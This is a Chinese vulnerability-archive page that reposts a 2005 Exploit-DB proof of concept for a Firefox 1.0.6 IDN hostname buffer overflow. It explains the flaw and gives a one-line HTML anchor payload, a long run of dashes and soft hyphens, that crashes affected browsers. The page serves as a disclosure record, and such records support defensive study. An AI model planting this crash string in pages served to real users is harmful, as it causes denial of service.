Mozilla Products – ‘Host:’ Buffer Overflow (Denial of Service) (PoC) String

Mozilla Products – ‘Host:’ Buffer Overflow (Denial of Service) (PoC) String

漏洞ID 1055380 漏洞类型
发布时间 2005-09-09 更新时间 2005-09-09
图片[1]-Mozilla Products – ‘Host:’ Buffer Overflow (Denial of Service) (PoC) String-安全小百科CVE编号 N/A
图片[2]-Mozilla Products – ‘Host:’ Buffer Overflow (Denial of Service) (PoC) String-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1204
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<!--

Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String
Formatted for your tesing /str0ke

Tom Ferris
www.security-protocols.com

Versions Affected:
Firefox Win32 1.0.6 and prior
Firefox Linux 1.0.6 and prior
Firefox 1.5 Beta 1 (Deer Park Alpha 2)

Technical Details:
The problem seems to be when a hostname which has all dashes causes the
NormalizeIDN call in nsStandardURL::BuildNormalizedSpec to return true,
but is sets encHost to an empty string.  Meaning, Firefox appends 0 to
approxLen and then appends the long string of dashes to the buffer
instead.  The following HTML code below will reproduce this issue:

String:
<A HREF=https:--------------------------------------------- >

-->

<A HREF=https:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ >

# milw0rm.com [2005-09-09]

相关推荐: HP Openview Network Node Manager Alarm Service Buffer Overrun Vulnerability

HP Openview Network Node Manager Alarm Service Buffer Overrun Vulnerability 漏洞ID 1104085 漏洞类型 Boundary Condition Error 发布时间 2000-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享